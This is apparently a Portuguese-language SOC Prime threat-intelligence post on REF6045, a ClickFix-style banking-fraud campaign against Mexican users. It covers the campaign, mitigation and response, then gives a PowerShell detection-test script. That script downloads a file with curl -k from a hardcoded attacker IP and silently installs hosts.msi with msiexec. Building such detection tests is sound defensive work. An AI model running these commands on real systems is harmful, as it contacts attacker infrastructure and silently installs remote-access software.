SOC Prime Bias: Alto

08 Jul 2026 16:15 UTC

ClickFix para Sacar Dinheiro: Analisando um Kit de Fraude Bancária Mexicano

Author Photo
SOC Prime Team linkedin icon Seguir
ClickFix para Sacar Dinheiro: Analisando um Kit de Fraude Bancária Mexicano
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

REF6045 é uma campanha de fraude bancária assistida por operador, focada no setor financeiro mexicano. Utiliza um método de entrega estilo ClickFix com páginas CAPTCHA falsas para convencer as vítimas a executarem comandos maliciosos do PowerShell. Após a infecção, o toolkit SCMBANKER permite que operadores humanos observem sessões bancárias, capturem capturas de tela, alterem o conteúdo da área de transferência e implantem o RAT Remote Utilities para controle remoto total.

Investigação

Laboratórios de Segurança da Elastic descobriram a ameaça após detectar atividades suspeitas bitsadmin baixando scripts do PowerShell de um diretório aberto. A investigação expôs todo o toolkit por meio de um arquivo web-root acessível publicamente, zkt.zip, e revelou grandes falhas de segurança operacional, incluindo editores de arquivos não autenticados e diretórios abertos na infraestrutura de comando e controle. A análise também mostrou que o toolkit contém extensos artefatos gerados por IA em sua base de código.

Mitigação

As organizações devem limitar o uso do PowerShell e bitsadmin a usuários aprovados e aplicar controles rigorosos de execução. Os usuários devem ser treinados para identificar iscas de engenharia social, como prompts CAPTCHA falsos ou telas de atualização do Windows falsas. As equipes de segurança também devem implantar forte monitoramento para mudanças suspeitas no registro e instalação não autorizada de software de acesso remoto.

Resposta

Se essa atividade for detectada, isole imediatamente os sistemas afetados para interromper a comunicação de comando e controle e possível roubo de dados. Conduza uma investigação forense para determinar o escopo do comprometimento e verifique a presença de Remote Utilities ou modificações não autorizadas no registro. Redefina as senhas de todas as contas financeiras e outras contas sensíveis acessadas a partir das máquinas afetadas.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: A Verificação Pré-voo de Telemetria & Baseline deve ter sido aprovada.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.

  • Narrativa de Ataque & Comandos: O adversário visa estabelecer uma base no sistema alvo imitando o padrão de fraude bancária REF6045. Primeiro, eles tentam baixar um arquivo de validação de um endereço IP malicioso hardcoded (68.211.161.46) usando curl com a flag -k (insegura) para ignorar a validação do certificado SSL. Após o download, o adversário executa uma instalação silenciosa de uma ferramenta de acesso remoto maliciosa usando msiexec.exe com a flag /i (instalação) e /quiet (silencioso) switches, visando um arquivo chamado hosts.msi. Isso lhes fornece acesso remoto persistente enquanto minimiza a interação do usuário.

  • Script de Teste de Regressão:

    # Script de Simulação para TTPs REF6045
    # Este script imita as linhas de comando específicas definidas na regra de detecção.
    
    $WorkDir = "$env:TEMPSimulation"
    if (!(Test-Path $WorkDir)) { New-Item -ItemType Directory -Path $WorkDir }
    Set-Location $WorkDir
    
    Write-Host "[+] Etapa 1: Simulando Transferência de Ferramenta de Ingress via curl..." -ForegroundColor Cyan
    # Nota: Usando um arquivo falso via curl para evitar tráfego malicioso real, 
    # mas mantendo a exata string de linha de comando necessária para a detecção.
    cmd /c curl -k https://68.211.161.46/validation.txt
    
    Write-Host "[+] Etapa 2: Simulando Instalação Silenciosa de MSI..." -ForegroundColor Cyan
    # Crie um arquivo MSI fictício para que o msiexec não dê erro imediatamente (embora a regra seja acionada na linha de comando)
    # Apenas para testar a lógica de detecção (a linha de comando), 
    # executaremos a exata string de comando.
    msiexec /i "hosts.msi" /quiet /norestart
  • Comandos de Limpeza:

    # Script de limpeza para remover artefatos
    $WorkDir = "$env:TEMPSimulation"
    if (Test-Path $WorkDir) {
        Remove-Item -Recurse -Force $WorkDir
        Write-Host "[+] Limpeza concluída: $WorkDir removido." -ForegroundColor Green
    } else {
        Write-Host "[!] Limpeza ignorada: Diretório não encontrado." -ForegroundColor Yellow
    }